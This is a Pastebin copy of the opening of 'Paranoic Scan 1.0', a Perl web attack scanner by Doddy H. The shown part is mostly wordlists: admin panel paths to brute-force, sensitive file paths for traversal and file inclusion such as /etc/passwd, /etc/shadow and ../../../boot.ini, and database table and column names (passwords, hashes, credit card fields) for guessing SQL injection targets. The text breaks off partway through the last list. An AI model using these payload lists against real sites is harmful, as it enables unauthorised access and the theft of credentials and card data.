Advertisement
Doddy

Paranoic Scan 1.0 (Codigo identado)

Jul 15th, 2012
1,691
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 128.86 KB | None | 0 0
  1. #!usr/bin/perl
  2. #Paranoic Scan 1.0
  3. #Coded By Doddy H
  4. #Necessary modules
  5. #http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
  6. #The arrays are a collection of several I found on the web
  7.  
  8. #Modules
  9.  
  10. use Digest::MD5 qw(md5_hex);
  11. use Color::Output;
  12. Color::Output::Init;
  13.  
  14. use LWP::UserAgent;
  15. use IO::Socket;
  16. use URI::Split qw(uri_split);
  17. use HTML::LinkExtor;
  18. use File::Basename;
  19. use HTML::Form;
  20. use URI::Escape;
  21.  
  22. ##
  23.  
  24. ##Arrays
  25.  
  26. my @paneles = (
  27.     'admin/admin.asp',               'admin/login.asp',
  28.     'admin/index.asp',               'admin/admin.aspx',
  29.     'admin/login.aspx',              'admin/index.aspx',
  30.     'admin/webmaster.asp',           'admin/webmaster.aspx',
  31.     'asp/admin/index.asp',           'asp/admin/index.aspx',
  32.     'asp/admin/admin.asp',           'asp/admin/admin.aspx',
  33.     'asp/admin/webmaster.asp',       'asp/admin/webmaster.aspx',
  34.     'admin/',                        'login.asp',
  35.     'login.aspx',                    'admin.asp',
  36.     'admin.aspx',                    'webmaster.aspx',
  37.     'webmaster.asp',                 'login/index.asp',
  38.     'login/index.aspx',              'login/login.asp',
  39.     'login/login.aspx',              'login/admin.asp',
  40.     'login/admin.aspx',              'administracion/index.asp',
  41.     'administracion/index.aspx',     'administracion/login.asp',
  42.     'administracion/login.aspx',     'administracion/webmaster.asp',
  43.     'administracion/webmaster.aspx', 'administracion/admin.asp',
  44.     'administracion/admin.aspx',     'php/admin/',
  45.     'admin/admin.php',               'admin/index.php',
  46.     'admin/login.php',               'admin/system.php',
  47.     'admin/ingresar.php',            'admin/administrador.php',
  48.     'admin/default.php',             'administracion/',
  49.     'administracion/index.php',      'administracion/login.php',
  50.     'administracion/ingresar.php',   'administracion/admin.php',
  51.     'administration/',               'administration/index.php',
  52.     'administration/login.php',      'administrator/index.php',
  53.     'administrator/login.php',       'administrator/system.php',
  54.     'system/',                       'system/login.php',
  55.     'admin.php',                     'login.php',
  56.     'administrador.php',             'administration.php',
  57.     'administrator.php',             'admin1.html',
  58.     'admin1.php',                    'admin2.php',
  59.     'admin2.html',                   'yonetim.php',
  60.     'yonetim.html',                  'yonetici.php',
  61.     'yonetici.html',                 'adm/',
  62.     'admin/account.php',             'admin/account.html',
  63.     'admin/index.html',              'admin/login.html',
  64.     'admin/home.php',                'admin/controlpanel.html',
  65.     'admin/controlpanel.php',        'admin.html',
  66.     'admin/cp.php',                  'admin/cp.html',
  67.     'cp.php',                        'cp.html',
  68.     'administrator/',                'administrator/index.html',
  69.     'administrator/login.html',      'administrator/account.html',
  70.     'administrator/account.php',     'administrator.html',
  71.     'login.html',                    'modelsearch/login.php',
  72.     'moderator.php',                 'moderator.html',
  73.     'moderator/login.php',           'moderator/login.html',
  74.     'moderator/admin.php',           'moderator/admin.html',
  75.     'moderator/',                    'account.php',
  76.     'account.html',                  'controlpanel/',
  77.     'controlpanel.php',              'controlpanel.html',
  78.     'admincontrol.php',              'admincontrol.html',
  79.     'adminpanel.php',                'adminpanel.html',
  80.     'admin1.asp',                    'admin2.asp',
  81.     'yonetim.asp',                   'yonetici.asp',
  82.     'admin/account.asp',             'admin/home.asp',
  83.     'admin/controlpanel.asp',        'admin/cp.asp',
  84.     'cp.asp',                        'administrator/index.asp',
  85.     'administrator/login.asp',       'administrator/account.asp',
  86.     'administrator.asp',             'modelsearch/login.asp',
  87.     'moderator.asp',                 'moderator/login.asp',
  88.     'moderator/admin.asp',           'account.asp',
  89.     'controlpanel.asp',              'admincontrol.asp',
  90.     'adminpanel.asp',                'fileadmin/',
  91.     'fileadmin.php',                 'fileadmin.asp',
  92.     'fileadmin.html',                'administration.html',
  93.     'sysadmin.php',                  'sysadmin.html',
  94.     'phpmyadmin/',                   'myadmin/',
  95.     'sysadmin.asp',                  'sysadmin/',
  96.     'ur-admin.asp',                  'ur-admin.php',
  97.     'ur-admin.html',                 'ur-admin/',
  98.     'Server.php',                    'Server.html',
  99.     'Server.asp',                    'Server/',
  100.     'wp-admin/',                     'administr8.php',
  101.     'administr8.html',               'administr8/',
  102.     'administr8.asp',                'webadmin/',
  103.     'webadmin.php',                  'webadmin.asp',
  104.     'webadmin.html',                 'administratie/',
  105.     'admins/',                       'admins.php',
  106.     'admins.asp',                    'admins.html',
  107.     'administrivia/',                'Database_Administration/',
  108.     'WebAdmin/',                     'useradmin/',
  109.     'sysadmins/',                    'admin1/',
  110.     'system-administration/',        'administrators/',
  111.     'pgadmin/',                      'directadmin/',
  112.     'staradmin/',                    'ServerAdministrator/',
  113.     'SysAdmin/',                     'administer/',
  114.     'LiveUser_Admin/',               'sys-admin/',
  115.     'typo3/',                        'panel/',
  116.     'cpanel/',                       'cPanel/',
  117.     'cpanel_file/',                  'platz_login/',
  118.     'rcLogin/',                      'blogindex/',
  119.     'formslogin/',                   'autologin/',
  120.     'support_login/',                'meta_login/',
  121.     'manuallogin/',                  'simpleLogin/',
  122.     'loginflat/',                    'utility_login/',
  123.     'showlogin/',                    'memlogin/',
  124.     'members/',                      'login-redirect/',
  125.     'sub-login/',                    'wp-login/',
  126.     'login1/',                       'dir-login/',
  127.     'login_db/',                     'xlogin/',
  128.     'smblogin/',                     'customer_login/',
  129.     'UserLogin/',                    'login-us/',
  130.     'acct_login/',                   'admin_area/',
  131.     'bigadmin/',                     'project-admins/',
  132.     'phppgadmin/',                   'pureadmin/',
  133.     'sql-admin/',                    'radmind/',
  134.     'openvpnadmin/',                 'wizmysqladmin/',
  135.     'vadmind/',                      'ezsqliteadmin/',
  136.     'hpwebjetadmin/',                'newsadmin/',
  137.     'adminpro/',                     'Lotus_Domino_Admin/',
  138.     'bbadmin/',                      'vmailadmin/',
  139.     'Indy_admin/',                   'ccp14admin/',
  140.     'irc-macadmin/',                 'banneradmin/',
  141.     'sshadmin/',                     'phpldapadmin/',
  142.     'macadmin/',                     'administratoraccounts/',
  143.     'admin4_account/',               'admin4_colon/',
  144.     'radmind-1/',                    'Super-Admin/',
  145.     'AdminTools/',                   'cmsadmin/',
  146.     'SysAdmin2/',                    'globes_admin/',
  147.     'cadmins/',                      'phpSQLiteAdmin/',
  148.     'navSiteAdmin/',                 'server_admin_small/',
  149.     'logo_sysadmin/',                'server/',
  150.     'database_administration/',      'power_user/',
  151.     'system_administration/',        'ss_vms_admin_sm/'
  152. );
  153.  
  154. my @files = (
  155.     'C:/xampp/htdocs/aca.txt',
  156.     'C:/xampp/htdocs/aca.txt',
  157.     'C:/xampp/htdocs/admin.php',
  158.     'C:/xampp/htdocs/leer.txt',
  159.     '../../../boot.ini',
  160.     '../../../../boot.ini',
  161.     '../../../../../boot.ini',
  162.     '../../../../../../boot.ini',
  163.     '/etc/passwd',
  164.     '/etc/shadow',
  165.     '/etc/shadow~',
  166.     '/etc/hosts',
  167.     '/etc/motd',
  168.     '/etc/apache/apache.conf',
  169.     '/etc/fstab',
  170.     '/etc/apache2/apache2.conf',
  171.     '/etc/apache/httpd.conf',
  172.     '/etc/httpd/conf/httpd.conf',
  173.     '/etc/apache2/httpd.conf',
  174.     '/etc/apache2/sites-available/default',
  175.     '/etc/mysql/my.cnf',
  176.     '/etc/my.cnf',
  177.     '/etc/sysconfig/network-scripts/ifcfg-eth0',
  178.     '/etc/redhat-release',
  179.     '/etc/httpd/conf.d/php.conf',
  180.     '/etc/pam.d/proftpd',
  181.     '/etc/phpmyadmin/config.inc.php',
  182.     '/var/www/config.php',
  183.     '/etc/httpd/logs/error_log',
  184.     '/etc/httpd/logs/error.log',
  185.     '/etc/httpd/logs/access_log',
  186.     '/etc/httpd/logs/access.log',
  187.     '/var/log/apache/error_log',
  188.     '/var/log/apache/error.log',
  189.     '/var/log/apache/access_log',
  190.     '/var/log/apache/access.log',
  191.     '/var/log/apache2/error_log',
  192.     '/var/log/apache2/error.log',
  193.     '/var/log/apache2/access_log',
  194.     '/var/log/apache2/access.log',
  195.     '/var/www/logs/error_log',
  196.     '/var/www/logs/error.log',
  197.     '/var/www/logs/access_log',
  198.     '/var/www/logs/access.log',
  199.     '/usr/local/apache/logs/error_log',
  200.     '/usr/local/apache/logs/error.log',
  201.     '/usr/local/apache/logs/access_log',
  202.     '/usr/local/apache/logs/access.log',
  203.     '/var/log/error_log',
  204.     '/var/log/error.log',
  205.     '/var/log/access_log',
  206.     '/var/log/access.log',
  207.     '/etc/group',
  208.     '/etc/security/group',
  209.     '/etc/security/passwd',
  210.     '/etc/security/user',
  211.     '/etc/security/environ',
  212.     '/etc/security/limits',
  213.     '/usr/lib/security/mkuser.default',
  214.     '/apache/logs/access.log',
  215.     '/apache/logs/error.log',
  216.     '/etc/httpd/logs/acces_log',
  217.     '/etc/httpd/logs/acces.log',
  218.     '/var/log/httpd/access_log',
  219.     '/var/log/httpd/error_log',
  220.     '/apache2/logs/error.log',
  221.     '/apache2/logs/access.log',
  222.     '/logs/error.log',
  223.     '/logs/access.log',
  224.     '/usr/local/apache2/logs/access_log',
  225.     '/usr/local/apache2/logs/access.log',
  226.     '/usr/local/apache2/logs/error_log',
  227.     '/usr/local/apache2/logs/error.log',
  228.     '/var/log/httpd/access.log',
  229.     '/var/log/httpd/error.log',
  230.     '/opt/lampp/logs/access_log',
  231.     '/opt/lampp/logs/error_log',
  232.     '/opt/xampp/logs/access_log',
  233.     '/opt/xampp/logs/error_log',
  234.     '/opt/lampp/logs/access.log',
  235.     '/opt/lampp/logs/error.log',
  236.     '/opt/xampp/logs/access.log',
  237.     '/opt/xampp/logs/error.log',
  238.     'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
  239.     'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
  240.     '/usr/local/apache/conf/httpd.conf',
  241.     '/usr/local/apache2/conf/httpd.conf',
  242.     '/etc/apache/conf/httpd.conf',
  243.     '/usr/local/etc/apache/conf/httpd.conf',
  244.     '/usr/local/apache/httpd.conf',
  245.     '/usr/local/apache2/httpd.conf',
  246.     '/usr/local/httpd/conf/httpd.conf',
  247.     '/usr/local/etc/apache2/conf/httpd.conf',
  248.     '/usr/local/etc/httpd/conf/httpd.conf',
  249.     '/usr/apache2/conf/httpd.conf',
  250.     '/usr/apache/conf/httpd.conf',
  251.     '/usr/local/apps/apache2/conf/httpd.conf',
  252.     '/usr/local/apps/apache/conf/httpd.conf',
  253.     '/etc/apache2/conf/httpd.conf',
  254.     '/etc/http/conf/httpd.conf',
  255.     '/etc/httpd/httpd.conf',
  256.     '/etc/http/httpd.conf',
  257.     '/etc/httpd.conf',
  258.     '/opt/apache/conf/httpd.conf',
  259.     '/opt/apache2/conf/httpd.conf',
  260.     '/var/www/conf/httpd.conf',
  261.     '/private/etc/httpd/httpd.conf',
  262.     '/private/etc/httpd/httpd.conf.default',
  263.     '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
  264.     '/Volumes/webBackup/private/etc/httpd/httpd.conf',
  265.     '/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
  266.     'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf',
  267.     'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf',
  268.     'C:\ProgramFiles\xampp\apache\conf\httpd.conf',
  269.     '/usr/local/php/httpd.conf.php',
  270.     '/usr/local/php4/httpd.conf.php',
  271.     '/usr/local/php5/httpd.conf.php',
  272.     '/usr/local/php/httpd.conf',
  273.     '/usr/local/php4/httpd.conf',
  274.     '/usr/local/php5/httpd.conf',
  275.     '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
  276.     '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
  277.     '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
  278.     '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
  279.     '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
  280.     '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
  281.     '/usr/local/etc/apache/vhosts.conf',
  282.     '/etc/php.ini',
  283.     '/bin/php.ini',
  284.     '/etc/httpd/php.ini',
  285.     '/usr/lib/php.ini',
  286.     '/usr/lib/php/php.ini',
  287.     '/usr/local/etc/php.ini',
  288.     '/usr/local/lib/php.ini',
  289.     '/usr/local/php/lib/php.ini',
  290.     '/usr/local/php4/lib/php.ini',
  291.     '/usr/local/php5/lib/php.ini',
  292.     '/usr/local/apache/conf/php.ini',
  293.     '/etc/php4.4/fcgi/php.ini',
  294.     '/etc/php4/apache/php.ini',
  295.     '/etc/php4/apache2/php.ini',
  296.     '/etc/php5/apache/php.ini',
  297.     '/etc/php5/apache2/php.ini',
  298.     '/etc/php/php.ini',
  299.     '/etc/php/php4/php.ini',
  300.     '/etc/php/apache/php.ini',
  301.     '/etc/php/apache2/php.ini',
  302.     '/web/conf/php.ini',
  303.     '/usr/local/Zend/etc/php.ini',
  304.     '/opt/xampp/etc/php.ini',
  305.     '/var/local/www/conf/php.ini',
  306.     '/etc/php/cgi/php.ini',
  307.     '/etc/php4/cgi/php.ini',
  308.     '/etc/php5/cgi/php.ini',
  309.     'c:\php5\php.ini',
  310.     'c:\php4\php.ini',
  311.     'c:\php\php.ini',
  312.     'c:\PHP\php.ini',
  313.     'c:\WINDOWS\php.ini',
  314.     'c:\WINNT\php.ini',
  315.     'c:\apache\php\php.ini',
  316.     'c:\xampp\apache\bin\php.ini',
  317.     'c:\NetServer\bin\stable\apache\php.ini',
  318.     'c:\home2\bin\stable\apache\php.ini',
  319.     'c:\home\bin\stable\apache\php.ini',
  320.     '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
  321.     '/usr/local/cpanel/logs',
  322.     '/usr/local/cpanel/logs/stats_log',
  323.     '/usr/local/cpanel/logs/access_log',
  324.     '/usr/local/cpanel/logs/error_log',
  325.     '/usr/local/cpanel/logs/license_log',
  326.     '/usr/local/cpanel/logs/login_log',
  327.     '/var/cpanel/cpanel.config',
  328.     '/var/log/mysql/mysql-bin.log',
  329.     '/var/log/mysql.log',
  330.     '/var/log/mysqlderror.log',
  331.     '/var/log/mysql/mysql.log',
  332.     '/var/log/mysql/mysql-slow.log',
  333.     '/var/mysql.log',
  334.     '/var/lib/mysql/my.cnf',
  335.     'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err',
  336.     'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log',
  337.     'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err',
  338.     'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log',
  339.     'C:\ProgramFiles\MySQL\data\hostname.err',
  340.     'C:\ProgramFiles\MySQL\data\mysql.log',
  341.     'C:\ProgramFiles\MySQL\data\mysql.err',
  342.     'C:\ProgramFiles\MySQL\data\mysql-bin.log',
  343.     'C:\MySQL\data\hostname.err',
  344.     'C:\MySQL\data\mysql.log',
  345.     'C:\MySQL\data\mysql.err',
  346.     'C:\MySQL\data\mysql-bin.log',
  347.     'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini',
  348.     'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf',
  349.     'C:\ProgramFiles\MySQL\my.ini',
  350.     'C:\ProgramFiles\MySQL\my.cnf',
  351.     'C:\MySQL\my.ini',
  352.     'C:\MySQL\my.cnf',
  353.     '/etc/logrotate.d/proftpd',
  354.     '/www/logs/proftpd.system.log',
  355.     '/var/log/proftpd',
  356.     '/etc/proftp.conf',
  357.     '/etc/protpd/proftpd.conf',
  358.     '/etc/vhcs2/proftpd/proftpd.conf',
  359.     '/etc/proftpd/modules.conf',
  360.     '/var/log/vsftpd.log',
  361.     '/etc/vsftpd.chroot_list',
  362.     '/etc/logrotate.d/vsftpd.log',
  363.     '/etc/vsftpd/vsftpd.conf',
  364.     '/etc/vsftpd.conf',
  365.     '/etc/chrootUsers',
  366.     '/var/log/xferlog',
  367.     '/var/adm/log/xferlog',
  368.     '/etc/wu-ftpd/ftpaccess',
  369.     '/etc/wu-ftpd/ftphosts',
  370.     '/etc/wu-ftpd/ftpusers',
  371.     '/usr/sbin/pure-config.pl',
  372.     '/usr/etc/pure-ftpd.conf',
  373.     '/etc/pure-ftpd/pure-ftpd.conf',
  374.     '/usr/local/etc/pure-ftpd.conf',
  375.     '/usr/local/etc/pureftpd.pdb',
  376.     '/usr/local/pureftpd/etc/pureftpd.pdb',
  377.     '/usr/local/pureftpd/sbin/pure-config.pl',
  378.     '/usr/local/pureftpd/etc/pure-ftpd.conf',
  379.     '/etc/pure-ftpd/pure-ftpd.pdb',
  380.     '/etc/pureftpd.pdb',
  381.     '/etc/pureftpd.passwd',
  382.     '/etc/pure-ftpd/pureftpd.pdb',
  383.     '/var/log/pure-ftpd/pure-ftpd.log',
  384.     '/logs/pure-ftpd.log',
  385.     '/var/log/pureftpd.log',
  386.     '/var/log/ftp-proxy/ftp-proxy.log',
  387.     '/var/log/ftp-proxy',
  388.     '/var/log/ftplog',
  389.     '/etc/logrotate.d/ftp',
  390.     '/etc/ftpchroot',
  391.     '/etc/ftphosts',
  392.     '/var/log/exim_mainlog',
  393.     '/var/log/exim/mainlog',
  394.     '/var/log/maillog',
  395.     '/var/log/exim_paniclog',
  396.     '/var/log/exim/paniclog',
  397.     '/var/log/exim/rejectlog',
  398.     '/var/log/exim_rejectlog'
  399. );
  400. my @buscar1 = (
  401.     'usuario',                 'web_users',
  402.     'name',                    'names',
  403.     'nombre',                  'nombres',
  404.     'usuarios',                'member',
  405.     'members',                 'admin_table',
  406.     'usuaris',                 'admin',
  407.     'tblUsers',                'tblAdmin',
  408.     'user',                    'users',
  409.     'username',                'usernames',
  410.     'web_usuarios',            'miembro',
  411.     'miembros',                'membername',
  412.     'admins',                  'administrator',
  413.     'sign',                    'config',
  414.     'USUARIS',                 'cms_operadores',
  415.     'administrators',          'passwd',
  416.     'password',                'passwords',
  417.     'pass',                    'Pass',
  418.     'mpn_authors',             'author',
  419.     'musuario',                'mysql.user',
  420.     'user_names',              'foro',
  421.     'tAdmin',                  'tadmin',
  422.     'user_password',           'user_passwords',
  423.     'user_name',               'member_password',
  424.     'mods',                    'mod',
  425.     'moderators',              'moderator',
  426.     'user_email',              'jos_users',
  427.     'mb_user',                 'host',
  428.     'apellido_nombre',         'user_emails',
  429.     'user_mail',               'user_mails',
  430.     'mail',                    'emails',
  431.     'email',                   'address',
  432.     'jos_usuarios',            'tutorial_user_auth',
  433.     'e-mail',                  'emailaddress',
  434.     'correo',                  'correos',
  435.     'phpbb_users',             'log',
  436.     'logins',                  'login',
  437.     'tbl_usuarios',            'user_auth',
  438.     'login_radio',             'registers',
  439.     'register',                'usr',
  440.     'usrs',                    'ps',
  441.     'pw',                      'un',
  442.     'u_name',                  'u_pass',
  443.     'tbl_admin',               'usuarios_head',
  444.     'tpassword',               'tPassword',
  445.     'u_password',              'nick',
  446.     'nicks',                   'manager',
  447.     'managers',                'administrador',
  448.     'BG_CMS_Users',            'tUser',
  449.     'tUsers',                  'administradores',
  450.     'clave',                   'login_id',
  451.     'pwd',                     'pas',
  452.     'sistema_id',              'foro_usuarios',
  453.     'cliente',                 'sistema_usuario',
  454.     'sistema_password',        'contrasena',
  455.     'auth',                    'key',
  456.     'senha',                   'signin',
  457.     'dir_admin',               'alias',
  458.     'clientes',                'tb_admin',
  459.     'tb_administrator',        'tb_login',
  460.     'tb_logon',                'tb_members_tb_member',
  461.     'calendar_users',          'cursos',
  462.     'tb_users',                'tb_user',
  463.     'tb_sys',                  'sys',
  464.     'fazerlogon',              'logon',
  465.     'fazer',                   'authorization',
  466.     'curso',                   'membros',
  467.     'utilizadores',            'staff',
  468.     'nuke_authors',            'accounts',
  469.     'account',                 'accnts',
  470.     'signup',                  'leads',
  471.     'lead',                    'associated',
  472.     'accnt',                   'customers',
  473.     'customer',                'membres',
  474.     'administrateur',          'utilisateur',
  475.     'riacms_users',            'tuser',
  476.     'tusers',                  'utilisateurs',
  477.     'amministratore',          'god',
  478.     'God',                     'authors',
  479.     'wp_users',                'tb_usuarios',
  480.     'asociado',                'asociados',
  481.     'autores',                 'autor',
  482.     'Users',                   'Admin',
  483.     'Members',                 'tb_usuario',
  484.     'Miembros',                'Usuario',
  485.     'Usuarios',                'ADMIN',
  486.     'USERS',                   'USER',
  487.     'MEMBER',                  'MEMBERS',
  488.     'USUARIO',                 'USUARIOS',
  489.     'MIEMBROS',                'MIEMBRO',
  490.     'USR_NAME',                'about',
  491.     'access',                  'admin_id',
  492.     'admin_name',              'admin_pass',
  493.     'admin_passwd',            'admin_password',
  494.     'admin_pwd',               'admin_user',
  495.     'admin_userid',            'admin_username',
  496.     'adminemail',              'adminid',
  497.     'administrator_name',      'adminlogin',
  498.     'adminmail',               'adminname',
  499.     'adminuser',               'adminuserid',
  500.     'adminusername',           'aid',
  501.     'aim',                     'apwd',
  502.     'auid',                    'authenticate',
  503.     'authentication',          'blog',
  504.     'cc_expires',              'cc_number',
  505.     'cc_owner',                'cc_type',
  506.     'cfg',                     'cid',
  507.     'clientname',              'clientpassword',
  508.     'clientusername',          'conf',
  509.     'contact',                 'converge_pass_hash',
  510.     'converge_pass_salt',      'crack',
  511.     'customers_email_address', 'customers_password',
  512.     'cvvnumber]',              'data',
  513.     'db_database_name',        'db_hostname',
  514.     'db_password',             'db_username',
  515.     'download',                'e_mail',
  516.     'emer',                    'emni',
  517.     'emniplote',               'emri',
  518.     'fjalekalimi',             'fjalekalimin',
  519.     'full',                    'gid',
  520.     'group',                   'group_name',
  521.     'hash',                    'hashsalt',
  522.     'homepage',                'icq',
  523.     'icq_number',              'id',
  524.     'id_group',                'id_member',
  525.     'images',                  'ime',
  526.     'index',                   'ip_address',
  527.     'kodi',                    'korisnici',
  528.     'korisnik',                'kpro_user',
  529.     'last_ip',                 'last_login',
  530.     'lastname',                'llogaria',
  531.     'login_admin',             'login_name',
  532.     'login_pass',              'login_passwd',
  533.     'login_password',          'login_pw',
  534.     'login_pwd',               'login_user',
  535.     'login_username',          'logini',
  536.     'loginkey',                'loginout',
  537.     'logo',                    'logohu',
  538.     'lozinka',                 'md5hash',
  539.     'mem_login',               'mem_pass',
  540.     'mem_passwd',              'mem_password',
  541.     'mem_pwd',                 'member_id',
  542.     'member_login_key',        'member_name',
  543.     'memberid',                'memlogin',
  544.     'mempassword',             'my_email',
  545.     'my_name',                 'my_password',
  546.     'my_username',             'myname',
  547.     'mypassword',              'myusername',
  548.     'nc',                      'new',
  549.     'news',                    'number',
  550.     'nummer',                  'p_assword',
  551.     'p_word',                  'pass_hash',
  552.     'pass_w',                  'pass_word',
  553.     'pass1word',               'passw',
  554.     'passwordsalt',            'passwort',
  555.     'passwrd',                 'perdorimi',
  556.     'perdoruesi',              'personal_key',
  557.     'phone',                   'privacy',
  558.     'psw',                     'punetoret',
  559.     'punonjes',                'pword',
  560.     'pwrd',                    'salt',
  561.     'search',                  'secretanswer',
  562.     'secretquestion',          'serial',
  563.     'session_member_id',       'session_member_login_key',
  564.     'sesskey',                 'setting',
  565.     'sid',                     'sifra',
  566.     'spacer',                  'status',
  567.     'store',                   'store1',
  568.     'store2',                  'store3',
  569.     'store4',                  'table_prefix',
  570.     'temp_pass',               'temp_password',
  571.     'temppass',                'temppasword',
  572.     'text',                    'uid',
  573.     'uname',                   'user_admin',
  574.     'user_icq',                'user_id',
  575.     'user_ip',                 'user_level',
  576.     'user_login',              'user_n',
  577.     'user_pass',               'user_passw',
  578.     'user_passwd',             'user_pw',
  579.     'user_pwd',                'user_pword',
  580.     'user_pwrd',               'user_un',
  581.     'user_uname',              'user_username',
  582.     'user_usernm',             'user_usernun',
  583.     'user_usrnm',              'user1',
  584.     'useradmin',               'userid',
  585.     'userip',                  'userlogin',
  586.     'usern',                   'usernm',
  587.     'userpass',                'userpassword',
  588.     'userpw',                  'userpwd',
  589.     'usr_n',                   'usr_name',
  590.     'usr_pass',                'usr2',
  591.     'usrn',                    'usrnam',
  592.     'usrname',                 'usrnm',
  593.     'usrpass',                 'warez',
  594.     'xar_name',                'xar_pass',
  595.     'nom dutilisateur',        'mot de passe',
  596.     'compte',                  'comptes',
  597.     'aide',                    'objectif',
  598.     'authentifier',            'authentification',
  599.     'Contact',                 'fissure',
  600.     'client',                  'clients',
  601.     'de donn?es',              'mot_de_passe_bdd',
  602.     't?l?charger',             'E-mail',
  603.     'adresse e-mail',          'Emer',
  604.     'complet',                 'groupe',
  605.     'hachage',                 'Page daccueil',
  606.     'Kodi',                    'nom',
  607.     'connexion',               'membre',
  608.     'MEMBERNAME',              'mon_mot_de_passe',
  609.     'monmotdepasse',           'ignatiusj',
  610.     'caroline-du-nord',        'nouveau',
  611.     'Nick',                    'passer',
  612.     'Passw',                   'Mot de passe',
  613.     't?l?phone',               'protection de la vie priv?e',
  614.     'PSW',                     'pWord',
  615.     'sel',                     'recherche',
  616.     'de s?rie',                'param?tre',
  617.     '?tat',                    'stocker',
  618.     'texte',                   'cvvnumber'
  619. );
  620. my @buscar2 = (
  621.     'name',                          'user',
  622.     'user_name',                     'user_username',
  623.     'uname',                         'user_uname',
  624.     'usern',                         'user_usern',
  625.     'un',                            'user_un',
  626.     'mail',                          'cliente',
  627.     'usrnm',                         'user_usrnm',
  628.     'usr',                           'admin_name',
  629.     'cla_adm',                       'usu_adm',
  630.     'fazer',                         'logon',
  631.     'fazerlogon',                    'authorization',
  632.     'membros',                       'utilizadores',
  633.     'sysadmin',                      'email',
  634.     'senha',                         'username',
  635.     'usernm',                        'user_usernm',
  636.     'nm',                            'user_nm',
  637.     'login',                         'u_name',
  638.     'nombre',                        'host',
  639.     'pws',                           'cedula',
  640.     'userName',                      'host_password',
  641.     'chave',                         'alias',
  642.     'apellido_nombre',               'cliente_nombre',
  643.     'cliente_email',                 'cliente_pass',
  644.     'cliente_user',                  'cliente_usuario',
  645.     'login_id',                      'sistema_id',
  646.     'author',                        'user_login',
  647.     'admin_user',                    'admin_pass',
  648.     'uh_usuario',                    'uh_password',
  649.     'psw',                           'host_username',
  650.     'sistema_usuario',               'auth',
  651.     'key',                           'usuarios_nombre',
  652.     'usuarios_nick',                 'usuarios_password',
  653.     'user_clave',                    'membername',
  654.     'nme',                           'unme',
  655.     'password',                      'user_password',
  656.     'autores',                       'pass_hash',
  657.     'hash',                          'pass',
  658.     'correo',                        'usuario_nombre',
  659.     'usuario_nick',                  'usuario_password',
  660.     'userpass',                      'user_pass',
  661.     'upw',                           'pword',
  662.     'user_pword',                    'passwd',
  663.     'user_passwd',                   'passw',
  664.     'user_passw',                    'pwrd',
  665.     'user_pwrd',                     'pwd',
  666.     'authors',                       'user_pwd',
  667.     'u_pass',                        'clave',
  668.     'usuario',                       'contrasena',
  669.     'pas',                           'sistema_password',
  670.     'autor',                         'upassword',
  671.     'web_password',                  'web_username',
  672.     'tbladmins',                     'sort',
  673.     '_wfspro_admin',                 '4images_users',
  674.     'a_admin',                       'account',
  675.     'accounts',                      'adm',
  676.     'admin',                         'admin_login',
  677.     'admin_userinfo',                'administer',
  678.     'administrable',                 'administrate',
  679.     'administration',                'administrator',
  680.     'administrators',                'adminrights',
  681.     'admins',                        'adminuser',
  682.     'art',                           'article_admin',
  683.     'articles',                      'artikel',
  684.     'ÃÜÂë',                          'aut',
  685.     'autore',                        'backend',
  686.     'backend_users',                 'backenduser',
  687.     'bbs',                           'book',
  688.     'chat_config',                   'chat_messages',
  689.     'chat_users',                    'client',
  690.     'clients',                       'clubconfig',
  691.     'company',                       'config',
  692.     'contact',                       'contacts',
  693.     'content',                       'control',
  694.     'cpg_config',                    'cpg132_users',
  695.     'customer',                      'customers',
  696.     'customers_basket',              'dbadmins',
  697.     'dealer',                        'dealers',
  698.     'diary',                         'download',
  699.     'Dragon_users',                  'e107.e107_user',
  700.     'e107_user',                     'forum.ibf_members',
  701.     'fusion_user_groups',            'fusion_users',
  702.     'group',                         'groups',
  703.     'ibf_admin_sessions',            'ibf_conf_settings',
  704.     'ibf_members',                   'ibf_members_converge',
  705.     'ibf_sessions',                  'icq',
  706.     'images',                        'index',
  707.     'info',                          'ipb.ibf_members',
  708.     'ipb_sessions',                  'joomla_users',
  709.     'jos_blastchatc_users',          'jos_comprofiler_members',
  710.     'jos_contact_details',           'jos_joomblog_users',
  711.     'jos_messages_cfg',              'jos_moschat_users',
  712.     'jos_users',                     'knews_lostpass',
  713.     'korisnici',                     'kpro_adminlogs',
  714.     'kpro_user',                     'links',
  715.     'login_admin',                   'login_admins',
  716.     'login_user',                    'login_users',
  717.     'logins',                        'logs',
  718.     'lost_pass',                     'lost_passwords',
  719.     'lostpass',                      'lostpasswords',
  720.     'm_admin',                       'main',
  721.     'mambo_session',                 'mambo_users',
  722.     'manage',                        'manager',
  723.     'mb_users',                      'member',
  724.     'memberlist',                    'members',
  725.     'minibbtable_users',             'mitglieder',
  726.     'movie',                         'movies',
  727.     'mybb_users',                    'mysql',
  728.     'mysql.user',                    'names',
  729.     'news',                          'news_lostpass',
  730.     'newsletter',                    'nuke_authors',
  731.     'nuke_bbconfig',                 'nuke_config',
  732.     'nuke_popsettings',              'nuke_users',
  733.     'Óû§',                          'obb_profiles',
  734.     'order',                         'orders',
  735.     'parol',                         'partner',
  736.     'partners',                      'passes',
  737.     'passwords',                     'perdorues',
  738.     'perdoruesit',                   'phorum_session',
  739.     'phorum_user',                   'phorum_users',
  740.     'phpads_clients',                'phpads_config',
  741.     'phpbb_users',                   'phpBB2.forum_users',
  742.     'phpBB2.phpbb_users',            'phpmyadmin.pma_table_info',
